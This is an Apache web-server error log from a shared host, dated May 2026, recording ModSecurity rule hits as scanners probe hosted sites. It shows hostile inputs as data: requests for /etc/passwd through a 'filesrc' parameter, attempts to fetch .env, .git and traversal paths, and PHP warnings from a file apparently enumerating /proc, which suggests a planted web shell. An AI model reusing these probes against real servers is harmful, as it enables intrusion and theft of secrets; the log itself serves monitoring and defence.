[Tue May 12 01:21:01.845100 2026] [security2:error] [pid 1695975:tid 1695981] [client 43.130.116.87:42966] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/xmlrpc.php"] [unique_id "agJkXdVI9ymHBxup749zNQAAAIM"]
[Tue May 12 01:21:36.692068 2026] [security2:error] [pid 1707624:tid 1707684] [client 216.73.216.110:40086] ModSecurity: Warning. Matched phrase "etc/fstab" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/fstab found within ARGS:filesrc: /etc/fstab.quotas"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJkgLOxS7i6i_mT2NKvnAAAAEI"]
[Tue May 12 01:21:36.692798 2026] [security2:error] [pid 1707624:tid 1707684] [client 216.73.216.110:40086] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJkgLOxS7i6i_mT2NKvnAAAAEI"]
[Tue May 12 01:21:36.797822 2026] [security2:error] [pid 1707624:tid 1707684] [client 216.73.216.110:40086] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJkgLOxS7i6i_mT2NKvnAAAAEI"]
[Tue May 12 01:21:38.789125 2026] [security2:error] [pid 1691274:tid 1691277] [client 216.73.216.110:57919] ModSecurity: Warning. Matched phrase "etc/passwd" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/passwd found within ARGS:filesrc: /etc/passwd,v"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJkglfdQaraX_prmqcFcAAAAAA"]
[Tue May 12 01:21:38.789760 2026] [security2:error] [pid 1691274:tid 1691277] [client 216.73.216.110:57919] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJkglfdQaraX_prmqcFcAAAAAA"]
[Tue May 12 01:21:38.854223 2026] [security2:error] [pid 1691274:tid 1691277] [client 216.73.216.110:57919] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJkglfdQaraX_prmqcFcAAAAAA"]
[Tue May 12 01:21:42.537835 2026] [security2:error] [pid 1695975:tid 1695981] [client 43.157.95.131:43698] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agJkhtVI9ymHBxup749zbAAAAIM"]
[Tue May 12 01:21:44.715275 2026] [security2:error] [pid 1691274:tid 1691285] [client 43.157.95.131:39568] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agJkiFfdQaraX_prmqcFdQAAAAg"], referer: http://www.tchatbooster.com
PHP Warning:  filesize(): stat failed for /proc/1705038/task/1705038/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705038/task/1705038/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705038/task/1705038/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705038/task/1705038/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705038/task/1705038/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705038/task/1705038/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:22:36.135022 2026] [:error] [pid 1695975:tid 1696002] [client 46.151.178.13:43030] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Tue May 12 01:22:45.616420 2026] [security2:error] [pid 1691274:tid 1691295] [client 176.65.139.231:33040] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJkxVfdQaraX_prmqcFxAAAABM"]
[Tue May 12 01:22:45.617119 2026] [security2:error] [pid 1691274:tid 1691295] [client 176.65.139.231:33040] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJkxVfdQaraX_prmqcFxAAAABM"]
[Tue May 12 01:22:47.970967 2026] [security2:error] [pid 1691274:tid 1691295] [client 176.65.139.231:33040] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agJkxVfdQaraX_prmqcFxAAAABM"]
[Tue May 12 01:22:48.559483 2026] [autoindex:error] [pid 1707624:tid 1707691] [client 66.132.172.132:50972] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 01:23:51.840287 2026] [ssl:error] [pid 1630927:tid 1630941] (EAI 2)Name or service not known: [client 45.88.138.44:35128] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 01:23:51.840444 2026] [ssl:error] [pid 1630927:tid 1630941] AH01941: stapling_renew_response: responder error
[Tue May 12 01:23:54.389069 2026] [ssl:error] [pid 1707624:tid 1707684] (EAI 2)Name or service not known: [client 45.88.138.44:35144] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 01:23:54.389150 2026] [ssl:error] [pid 1707624:tid 1707684] AH01941: stapling_renew_response: responder error
[Tue May 12 01:24:17.444610 2026] [authz_core:error] [pid 1707624:tid 1707690] [client 4.193.121.6:10379] AH01630: client denied by server configuration: /home/hominfr/public_html/wp-content/cache
[Tue May 12 01:24:26.855018 2026] [security2:error] [pid 1630927:tid 1630952] [client 150.109.12.46:37296] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agJlKmiGYYhUwDaJINnM4QAAAVY"]
[Tue May 12 01:24:33.112478 2026] [security2:error] [pid 1695975:tid 1695996] [client 150.109.12.46:43980] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/lodge-tahiti/"] [unique_id "agJlMdVI9ymHBxup7490rQAAAJI"], referer: https://rentparadise.fr/?post_type=mphb_room_type&p=5374
[Tue May 12 01:24:45.270235 2026] [:error] [pid 1695975:tid 1695995] [client 47.82.14.210:40880] File does not exist: /home/ofcrysta/public_html/index2.php
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704667/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704667/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704667/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704667/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704667/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704667/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:25:17.738185 2026] [security2:error] [pid 1691274:tid 1691279] [client 43.163.85.226:60794] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tchatbooster.com"] [uri "/"] [unique_id "agJlXVfdQaraX_prmqcG5AAAAAI"]
[Tue May 12 01:25:20.023433 2026] [security2:error] [pid 1707624:tid 1707695] [client 43.163.85.226:48568] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agJlYLOxS7i6i_mT2NKxAAAAAE0"], referer: http://tchatbooster.com
PHP Warning:  filesize(): stat failed for /proc/14/task/14/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/14/task/14/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/14/task/14/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/14/task/14/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/14/task/14/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/14/task/14/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:25:41.189138 2026] [security2:error] [pid 1707624:tid 1707692] [client 43.130.116.87:58068] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/wp-content/themes/enfold/config-layerslider/LayerSlider/static/layerslider/skins/"] [unique_id "agJldbOxS7i6i_mT2NKxFgAAAEo"]
PHP Warning:  filesize(): stat failed for /proc/5/task/5/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/5/task/5/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/5/task/5/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/5/task/5/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/5/task/5/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/5/task/5/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:26:45.640192 2026] [authz_core:error] [pid 1709071:tid 1709102] [client 47.128.28.126:22626] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/html-api/error_log
[Tue May 12 01:27:17.332564 2026] [security2:error] [pid 1630927:tid 1630939] [client 119.28.122.202:44352] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "ventes-privees-auto.fr"] [uri "/"] [unique_id "agJl1WiGYYhUwDaJINnO0wAAAUk"]
[Tue May 12 01:27:30.424158 2026] [security2:error] [pid 1709071:tid 1709090] [client 43.155.140.157:33238] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJl4rvMumyrWMfSu7qSKwAAAMM"]
[Tue May 12 01:27:44.328380 2026] [core:error] [pid 1630927:tid 1630938] [client 45.148.10.246:15502] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 01:27:44.329248 2026] [security2:error] [pid 1630927:tid 1630933] [client 45.148.10.246:15552] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/backend/.env"] [unique_id "agJl8GiGYYhUwDaJINnO8AAAAUM"]
[Tue May 12 01:27:44.329406 2026] [security2:error] [pid 1695975:tid 1695987] [client 45.148.10.246:15472] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.git/index"] [unique_id "agJl8NVI9ymHBxup7492jgAAAIk"]
[Tue May 12 01:27:44.329491 2026] [security2:error] [pid 1630927:tid 1630933] [client 45.148.10.246:15552] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/backend/.env"] [unique_id "agJl8GiGYYhUwDaJINnO8AAAAUM"]
[Tue May 12 01:27:44.329594 2026] [security2:error] [pid 1695975:tid 1695987] [client 45.148.10.246:15472] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.git/index"] [unique_id "agJl8NVI9ymHBxup7492jgAAAIk"]
[Tue May 12 01:27:44.329899 2026] [security2:error] [pid 1695975:tid 1695987] [client 45.148.10.246:15472] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.git/index"] [unique_id "agJl8NVI9ymHBxup7492jgAAAIk"]
[Tue May 12 01:27:44.331068 2026] [security2:error] [pid 1691274:tid 1691299] [client 45.148.10.246:15636] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env#"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env#"] [unique_id "agJl8FfdQaraX_prmqcICAAAABg"]
[Tue May 12 01:27:44.331084 2026] [security2:error] [pid 1695975:tid 1695981] [client 45.148.10.246:15624] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.production.local"] [unique_id "agJl8NVI9ymHBxup7492kAAAAIM"]
[Tue May 12 01:27:44.331315 2026] [security2:error] [pid 1691274:tid 1691299] [client 45.148.10.246:15636] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env#"] [unique_id "agJl8FfdQaraX_prmqcICAAAABg"]
[Tue May 12 01:27:44.331317 2026] [security2:error] [pid 1695975:tid 1695981] [client 45.148.10.246:15624] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.production.local"] [unique_id "agJl8NVI9ymHBxup7492kAAAAIM"]
[Tue May 12 01:27:44.331652 2026] [security2:error] [pid 1695975:tid 1695981] [client 45.148.10.246:15624] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.production.local"] [unique_id "agJl8NVI9ymHBxup7492kAAAAIM"]
[Tue May 12 01:27:44.331685 2026] [security2:error] [pid 1691274:tid 1691299] [client 45.148.10.246:15636] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env#"] [unique_id "agJl8FfdQaraX_prmqcICAAAABg"]
[Tue May 12 01:27:44.331865 2026] [security2:error] [pid 1707624:tid 1707699] [client 45.148.10.246:15640] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env~"] [unique_id "agJl8LOxS7i6i_mT2NKxuwAAAFE"]
